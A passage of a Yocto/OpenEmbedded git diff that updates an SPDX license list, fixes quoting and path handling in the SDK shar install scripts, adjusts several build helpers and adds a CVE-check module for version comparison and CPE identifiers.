+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-S-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-S-2.0.json",
+ "referenceNumber": 443,
+ "name": "CERN Open Hardware Licence Version 2 - Strongly Reciprocal",
+ "licenseId": "CERN-OHL-S-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ErlPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ErlPL-1.1.json",
+ "referenceNumber": 444,
+ "name": "Erlang Public License v1.1",
+ "licenseId": "ErlPL-1.1",
+ "seeAlso": [
+ "http://www.erlang.org/EPLICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-CMU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-CMU.json",
+ "referenceNumber": 445,
+ "name": "CMU License",
+ "licenseId": "MIT-CMU",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:MIT?rd\u003dLicensing/MIT#CMU_Style",
+ "https://github.com/python-pillow/Pillow/blob/fffb426092c8db24a5f4b6df243a8a3c01fb63cd/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NIST-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NIST-PD.json",
+ "referenceNumber": 446,
+ "name": "NIST Public Domain Notice",
+ "licenseId": "NIST-PD",
+ "seeAlso": [
+ "https://github.com/tcheneau/simpleRPL/blob/e645e69e38dd4e3ccfeceb2db8cba05b7c2e0cd3/LICENSE.txt",
+ "https://github.com/tcheneau/Routing/blob/f09f46fcfe636107f22f2c98348188a65a135d98/README.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-2.0.json",
+ "referenceNumber": 447,
+ "name": "Open Software License 2.0",
+ "licenseId": "OSL-2.0",
+ "seeAlso": [
+ "http://web.archive.org/web/20041020171434/http://www.rosenlaw.com/osl2.0.html"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-2.0.json",
+ "referenceNumber": 448,
+ "name": "Apple Public Source License 2.0",
+ "licenseId": "APSL-2.0",
+ "seeAlso": [
+ "http://www.opensource.apple.com/license/apsl/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Leptonica.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Leptonica.json",
+ "referenceNumber": 449,
+ "name": "Leptonica License",
+ "licenseId": "Leptonica",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Leptonica"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.json",
+ "referenceNumber": 450,
+ "name": "PolyForm Small Business License 1.0.0",
+ "licenseId": "PolyForm-Small-Business-1.0.0",
+ "seeAlso": [
+ "https://polyformproject.org/licenses/small-business/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-P-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-P-1.1.json",
+ "referenceNumber": 451,
+ "name": "Licence Libre du Québec – Permissive version 1.1",
+ "licenseId": "LiLiQ-P-1.1",
+ "seeAlso": [
+ "https://forge.gouv.qc.ca/licence/fr/liliq-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-P-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NetCDF.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NetCDF.json",
+ "referenceNumber": 452,
+ "name": "NetCDF license",
+ "licenseId": "NetCDF",
+ "seeAlso": [
+ "http://www.unidata.ucar.edu/software/netcdf/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OML.json",
+ "referenceNumber": 453,
+ "name": "Open Market License",
+ "licenseId": "OML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Open_Market_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-or-later.json",
+ "referenceNumber": 454,
+ "name": "GNU Affero General Public License v3.0 or later",
+ "licenseId": "AGPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.json",
+ "referenceNumber": 455,
+ "name": "Open LDAP Public License v2.2",
+ "licenseId": "OLDAP-2.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d470b0c18ec67621c85881b2733057fecf4a1acc3"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause.json",
+ "referenceNumber": 456,
+ "name": "BSD 3-Clause \"New\" or \"Revised\" License",
+ "licenseId": "BSD-3-Clause",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSD-3-Clause"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/WTFPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/WTFPL.json",
+ "referenceNumber": 457,
+ "name": "Do What The F*ck You Want To Public License",
+ "licenseId": "WTFPL",
+ "seeAlso": [
+ "http://www.wtfpl.net/about/",
+ "http://sam.zoy.org/wtfpl/COPYING"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-2.0.json",
+ "referenceNumber": 458,
+ "name": "Open Government Licence v2.0",
+ "licenseId": "OGL-UK-2.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/2/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Attribution.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Attribution.json",
+ "referenceNumber": 459,
+ "name": "BSD with attribution",
+ "licenseId": "BSD-3-Clause-Attribution",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD_with_Attribution"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RPSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPSL-1.0.json",
+ "referenceNumber": 460,
+ "name": "RealNetworks Public Source License v1.0",
+ "licenseId": "RPSL-1.0",
+ "seeAlso": [
+ "https://helixcommunity.org/content/rpsl",
+ "https://opensource.org/licenses/RPSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.json",
+ "referenceNumber": 461,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Germany",
+ "licenseId": "CC-BY-NC-ND-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.1.json",
+ "referenceNumber": 462,
+ "name": "European Union Public License 1.1",
+ "licenseId": "EUPL-1.1",
+ "seeAlso": [
+ "https://joinup.ec.europa.eu/software/page/eupl/licence-eupl",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl1.1.-licence-en_0.pdf",
+ "https://opensource.org/licenses/EUPL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sendmail-8.23.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sendmail-8.23.json",
+ "referenceNumber": 463,
+ "name": "Sendmail License 8.23",
+ "licenseId": "Sendmail-8.23",
+ "seeAlso": [
+ "https://www.proofpoint.com/sites/default/files/sendmail-license.pdf",
+ "https://web.archive.org/web/20181003101040/https://www.proofpoint.com/sites/default/files/sendmail-license.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ODC-By-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ODC-By-1.0.json",
+ "referenceNumber": 464,
+ "name": "Open Data Commons Attribution License v1.0",
+ "licenseId": "ODC-By-1.0",
+ "seeAlso": [
+ "https://opendatacommons.org/licenses/by/1.0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/D-FSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/D-FSL-1.0.json",
+ "referenceNumber": 465,
+ "name": "Deutsche Freie Software Lizenz",
+ "licenseId": "D-FSL-1.0",
+ "seeAlso": [
+ "http://www.dipp.nrw.de/d-fsl/lizenzen/",
+ "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/de/D-FSL-1_0_de.txt",
+ "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/en/D-FSL-1_0_en.txt",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/deutsche-freie-software-lizenz",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/german-free-software-license",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_de.txt/at_download/file",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_en.txt/at_download/file"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause.json",
+ "referenceNumber": 466,
+ "name": "BSD 4-Clause \"Original\" or \"Old\" License",
+ "licenseId": "BSD-4-Clause",
+ "seeAlso": [
+ "http://directory.fsf.org/wiki/License:BSD_4Clause"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1.json",
+ "referenceNumber": 467,
+ "name": "GNU Lesser General Public License v2.1 only",
+ "licenseId": "LGPL-2.1",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-Views.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Views.json",
+ "referenceNumber": 468,
+ "name": "BSD 2-Clause with views sentence",
+ "licenseId": "BSD-2-Clause-Views",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/freebsd-license.html",
+ "https://people.freebsd.org/~ivoras/wine/patch-wine-nvidia.sh",
+ "https://github.com/protegeproject/protege/blob/master/license.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0-Perl.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-Perl.json",
+ "referenceNumber": 469,
+ "name": "Artistic License 1.0 (Perl)",
+ "licenseId": "Artistic-1.0-Perl",
+ "seeAlso": [
+ "http://dev.perl.org/licenses/artistic.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPOSL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPOSL-3.0.json",
+ "referenceNumber": 470,
+ "name": "Non-Profit Open Software License 3.0",
+ "licenseId": "NPOSL-3.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/NOSL3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/gSOAP-1.3b.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/gSOAP-1.3b.json",
+ "referenceNumber": 471,
+ "name": "gSOAP Public License v1.3b",
+ "licenseId": "gSOAP-1.3b",
+ "seeAlso": [
+ "http://www.cs.fsu.edu/~engelen/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Interbase-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Interbase-1.0.json",
+ "referenceNumber": 472,
+ "name": "Interbase Public License v1.0",
+ "licenseId": "Interbase-1.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20060319014854/http://info.borland.com/devsupport/interbase/opensource/IPL.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/StandardML-NJ.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/StandardML-NJ.json",
+ "referenceNumber": 473,
+ "name": "Standard ML of New Jersey License",
+ "licenseId": "StandardML-NJ",
+ "seeAlso": [
+ "http://www.smlnj.org//license.html"
+ ],
+ "isOsiApproved": false
+ }
+ ],
+ "releaseDate": "2021-08-08"
+}
\ No newline at end of file
diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh
index bea6d4189a..4386b985bb 100644
--- a/meta/files/toolchain-shar-extract.sh
+++ b/meta/files/toolchain-shar-extract.sh
@@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then
exit 1
fi
-DEFAULT_INSTALL_DIR="@SDKPATH@"
+SDK_BUILD_PATH="@SDKPATH@"
+DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@"
SUDO_EXEC=""
EXTRA_TAR_OPTIONS=""
target_sdk_dir=""
@@ -95,7 +96,7 @@ while getopts ":yd:npDRSl" OPT; do
listcontents=1
;;
*)
- echo "Usage: $(basename $0) [-y] [-d <dir>]"
+ echo "Usage: $(basename "$0") [-y] [-d <dir>]"
echo " -y Automatic yes to all prompts"
echo " -d <dir> Install the SDK to <dir>"
echo "======== Extensible SDK only options ============"
@@ -111,17 +112,17 @@ while getopts ":yd:npDRSl" OPT; do
esac
done
-payload_offset=$(($(grep -na -m1 "^MARKER:$" $0|cut -d':' -f1) + 1))
+payload_offset=$(($(grep -na -m1 "^MARKER:$" "$0"|cut -d':' -f1) + 1))
if [ "$listcontents" = "1" ] ; then
if [ @SDK_ARCHIVE_TYPE@ = "zip" ]; then
- tail -n +$payload_offset $0 > sdk.zip
+ tail -n +$payload_offset "$0" > sdk.zip
if unzip -l sdk.zip;then
rm sdk.zip
else
rm sdk.zip && exit 1
fi
else
- tail -n +$payload_offset $0| tar tvJ || exit 1
+ tail -n +$payload_offset "$0"| tar tvJ || exit 1
fi
exit
fi
@@ -242,14 +243,14 @@ fi
printf "Extracting SDK..."
if [ @SDK_ARCHIVE_TYPE@ = "zip" ]; then
- tail -n +$payload_offset $0 > sdk.zip
+ tail -n +$payload_offset "$0" > sdk.zip
if $SUDO_EXEC unzip $EXTRA_TAR_OPTIONS sdk.zip -d $target_sdk_dir;then
rm sdk.zip
else
rm sdk.zip && exit 1
fi
else
- tail -n +$payload_offset $0| $SUDO_EXEC tar mxJ -C $target_sdk_dir --checkpoint=.2500 $EXTRA_TAR_OPTIONS || exit 1
+ tail -n +$payload_offset "$0"| $SUDO_EXEC tar mxJ -C $target_sdk_dir --checkpoint=.2500 $EXTRA_TAR_OPTIONS || exit 1
fi
echo "done"
diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh
index e3c10018ef..cee9adbf39 100644
--- a/meta/files/toolchain-shar-relocate.sh
+++ b/meta/files/toolchain-shar-relocate.sh
@@ -5,7 +5,7 @@ fi
# fix dynamic loader paths in all ELF SDK binaries
native_sysroot=$($SUDO_EXEC cat $env_setup_script |grep 'OECORE_NATIVE_SYSROOT='|cut -d'=' -f2|tr -d '"')
-dl_path=$($SUDO_EXEC find $native_sysroot/lib -name "ld-linux*")
+dl_path=$($SUDO_EXEC find $native_sysroot/lib -maxdepth 1 -name "ld-linux*")
if [ "$dl_path" = "" ] ; then
echo "SDK could not be set up. Relocate script unable to find ld-linux.so. Abort!"
exit 1
@@ -55,10 +55,13 @@ fi
for replace in "$target_sdk_dir -maxdepth 1" "$native_sysroot"; do
$SUDO_EXEC find $replace -type f
done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \
- awk -F':' '{printf "\"%s\"\n", $1}' | \
- grep -Ev "$target_sdk_dir/(environment-setup-*|relocate_sdk*|${0##*/})" | \
+ awk -F': ' '{printf "\"%s\"\n", $1}' | \
+ grep -Fv -e "$target_sdk_dir/environment-setup-" \
+ -e "$target_sdk_dir/relocate_sdk" \
+ -e "$target_sdk_dir/post-relocate-setup" \
+ -e "$target_sdk_dir/${0##*/}" | \
xargs -n100 $SUDO_EXEC sed -i \
- -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \
+ -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \
-e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \
-e "s: /usr/bin/perl: /usr/bin/env perl:g"
@@ -69,7 +72,7 @@ fi
# change all symlinks pointing to @SDKPATH@
for l in $($SUDO_EXEC find $native_sysroot -type l); do
- $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:") $l
+ $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$SDK_BUILD_PATH:$target_sdk_dir:") $l
if [ $? -ne 0 ]; then
echo "Failed to setup symlinks. Relocate script failed. Abort!"
exit 1
diff --git a/meta/lib/bblayers/create.py b/meta/lib/bblayers/create.py
index 542f31fc81..f49b48d1b4 100644
--- a/meta/lib/bblayers/create.py
+++ b/meta/lib/bblayers/create.py
@@ -71,7 +71,7 @@ class CreatePlugin(LayerPlugin):
def register_commands(self, sp):
parser_create_layer = self.add_command(sp, 'create-layer', self.do_create_layer, parserecipes=False)
parser_create_layer.add_argument('layerdir', help='Layer directory to create')
- parser_create_layer.add_argument('--priority', '-p', default=6, help='Layer directory to create')
+ parser_create_layer.add_argument('--priority', '-p', default=6, help='Priority of recipes in layer')
parser_create_layer.add_argument('--example-recipe-name', '-e', dest='examplerecipe', default='example', help='Filename of the example recipe')
parser_create_layer.add_argument('--example-recipe-version', '-v', dest='version', default='0.1', help='Version number for the example recipe')
diff --git a/meta/lib/buildstats.py b/meta/lib/buildstats.py
index 8627ed3c31..c52b6c3b72 100644
--- a/meta/lib/buildstats.py
+++ b/meta/lib/buildstats.py
@@ -43,8 +43,8 @@ class SystemStats:
# depends on the heartbeat event, which fires less often.
self.min_seconds = 1
- self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
- self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
+ self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
+ self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
self.diskstats_ltime = None
self.diskstats_data = None
self.stat_ltimes = None
diff --git a/meta/lib/oe/copy_buildsystem.py b/meta/lib/oe/copy_buildsystem.py
index 31a84f5b06..d97bf9d1b9 100644
--- a/meta/lib/oe/copy_buildsystem.py
+++ b/meta/lib/oe/copy_buildsystem.py
@@ -20,7 +20,7 @@ def _smart_copy(src, dest):
mode = os.stat(src).st_mode
if stat.S_ISDIR(mode):
bb.utils.mkdirhier(dest)
- cmd = "tar --exclude='.git' --xattrs --xattrs-include='*' -chf - -C %s -p . \
+ cmd = "tar --exclude='.git' --exclude='__pycache__' --xattrs --xattrs-include='*' -chf - -C %s -p . \
| tar --xattrs --xattrs-include='*' -xf - -C %s" % (src, dest)
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
else:
@@ -259,7 +259,7 @@ def create_locked_sstate_cache(lockedsigs, input_sstate_cache, output_sstate_cac
bb.note('Generating sstate-cache...')
nativelsbstring = d.getVar('NATIVELSBSTRING')
- bb.process.run("gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
+ bb.process.run("PYTHONDONTWRITEBYTECODE=1 gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
if fixedlsbstring and nativelsbstring != fixedlsbstring:
nativedir = output_sstate_cache + '/' + nativelsbstring
if os.path.isdir(nativedir):
@@ -286,7 +286,7 @@ def check_sstate_task_list(d, targets, filteroutfile, cmdprefix='', cwd=None, lo
logparam = '-l %s' % logfile
else:
logparam = ''
- cmd = "%sBB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
+ cmd = "%sPYTHONDONTWRITEBYTECODE=1 BB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
env = dict(d.getVar('BB_ORIGENV', False))
env.pop('BUILDDIR', '')
env.pop('BBPATH', '')
diff --git a/meta/lib/oe/cve_check.py b/meta/lib/oe/cve_check.py
new file mode 100644
index 0000000000..ed4af18ced
--- /dev/null
+++ b/meta/lib/oe/cve_check.py
@@ -0,0 +1,212 @@
+import collections
+import re
+import itertools
+import functools
+import os
+
+_Version = collections.namedtuple(
+ "_Version", ["release", "patch_l", "pre_l", "pre_v"]
+)
+
+@functools.total_ordering
+class Version():
+
+ def __init__(self, version, suffix=None):
+
+ suffixes = ["alphabetical", "patch"]
+
+ if str(suffix) == "alphabetical":
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(?P<patch_l>[a-z]))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ elif str(suffix) == "patch":
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(p|patch)(?P<patch_l>[0-9]+))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ else:
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ regex = re.compile(r"^\s*" + version_pattern + r"\s*$", re.VERBOSE | re.IGNORECASE)
+
+ match = regex.search(version)
+ if not match:
+ raise Exception("Invalid version: '{0}'".format(version))
+
+ self._version = _Version(
+ release=tuple(int(i) for i in match.group("release").replace("-",".").split(".")),
+ patch_l=match.group("patch_l") if str(suffix) in suffixes and match.group("patch_l") else "",
+ pre_l=match.group("pre_l"),
+ pre_v=match.group("pre_v")
+ )
+
+ self._key = _cmpkey(
+ self._version.release,
+ self._version.patch_l,
+ self._version.pre_l,
+ self._version.pre_v
+ )
+
+ def __eq__(self, other):
+ if not isinstance(other, Version):
+ return NotImplemented
+ return self._key == other._key
+
+ def __gt__(self, other):
+ if not isinstance(other, Version):
+ return NotImplemented
+ return self._key > other._key
+
+def _cmpkey(release, patch_l, pre_l, pre_v):
+    # remove trailing zeros from the release (e.g. 1.2.0 compares equal to 1.2)
+ _release = tuple(
+ reversed(list(itertools.dropwhile(lambda x: x == 0, reversed(release))))
+ )
+
+ _patch = patch_l.upper()
+
+ if pre_l is None and pre_v is None:
+ _pre = float('inf')
+ else:
+ _pre = float(pre_v) if pre_v else float('-inf')
+ return _release, _patch, _pre
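+
+# Example orderings (illustrative): comparison is driven by the numeric
+# release tuple, trailing zeros are ignored and pre-release versions sort
+# before the corresponding final release:
+#   Version("1.2.3") < Version("1.2.10")                   -> True
+#   Version("1.2.0") == Version("1.2")                     -> True
+#   Version("2.0-rc1") < Version("2.0")                    -> True
+#   Version("8.3p2", "patch") > Version("8.3p1", "patch")  -> True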
+
+def cve_check_merge_jsons(output, data):
+ """
+    Merge the data in the "package" property of "data" into the main
+    "output" data file.
+ """
+ if output["version"] != data["version"]:
+ bb.error("Version mismatch when merging JSON outputs")
+ return
+
+ for product in output["package"]:
+ if product["name"] == data["package"][0]["name"]:
+ bb.error("Error adding the same package %s twice" % product["name"])
+ return
+
+ output["package"].append(data["package"][0])
+
+def update_symlinks(target_path, link_path):
+ """
+ Update a symbolic link link_path to point to target_path.
+ Remove the link and recreate it if it exists and is different.
+ """
+ if link_path != target_path and os.path.exists(target_path):
+ if os.path.exists(os.path.realpath(link_path)):
+ os.remove(link_path)
+ os.symlink(os.path.basename(target_path), link_path)
+
+def get_patched_cves(d):
+ """
+ Get patches that solve CVEs using the "CVE: " tag.
+ """
+
+ import re
+ import oe.patch
+
+ pn = d.getVar("PN")
+ cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
+
+ # Matches the last "CVE-YYYY-ID" in the file name, even if written
+ # in lowercase. A file name may contain multiple CVE IDs, but only
+ # the last one is detected from the name itself; patch file contents
+ # addressing multiple CVE IDs are still supported (see the cve_match
+ # regular expression above).
+
+ cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
+
+ patched_cves = set()
+ bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
+ for url in oe.patch.src_patches(d):
+ patch_file = bb.fetch.decodeurl(url)[2]
+
+ # Check patch file name for CVE ID
+ fname_match = cve_file_name_match.search(patch_file)
+ if fname_match:
+ cve = fname_match.group(1).upper()
+ patched_cves.add(cve)
+ bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
+
+ # Remote patches won't be present and compressed patches won't be
+ # unpacked, so say we're not scanning them
+ if not os.path.isfile(patch_file):
+ bb.note("%s is remote or compressed, not scanning content" % patch_file)
+ continue
+
+ with open(patch_file, "r", encoding="utf-8") as f:
+ try:
+ patch_text = f.read()
+ except UnicodeDecodeError:
+ bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
+ " trying with iso8859-1" % patch_file)
+ f.close()
+ with open(patch_file, "r", encoding="iso8859-1") as f:
+ patch_text = f.read()
+
+ # Search for one or more "CVE: " lines
+ text_match = False
+ for match in cve_match.finditer(patch_text):
+ # Get only the CVEs without the "CVE: " tag
+ cves = patch_text[match.start()+5:match.end()]
+ for cve in cves.split():
+ bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
+ patched_cves.add(cve)
+ text_match = True
+
+ if not fname_match and not text_match:
+ bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+
+ return patched_cves
+
+
+def get_cpe_ids(cve_product, version):
+ """
+ Get list of CPE identifiers for the given product and version
+ """
+
+ version = version.split("+git")[0]
+
+ cpe_ids = []
+ for product in cve_product.split():
+ # CVE_PRODUCT in recipes may include vendor information for CPE identifiers. If not,
+ # use wildcard for vendor.
+ if ":" in product:
+ vendor, product = product.split(":", 1)
+ else:
+ vendor = "*"
+
+ cpe_id = 'cpe:2.3:a:{}:{}:{}:*:*:*:*:*:*:*'.format(vendor, product, version)
+ cpe_ids.append(cpe_id)
+
+ return cpe_ids
+
+def convert_cve_version(version):
+ """
+ This function converts from CVE format to Yocto version format.
+ eg 8.3_p1 -> 8.3p1, 6.2_rc1 -> 6.2-rc1
+
+ Unless it is redefined using CVE_VERSION in the recipe,
+ cve_check uses the version in the name of the recipe (${PV})
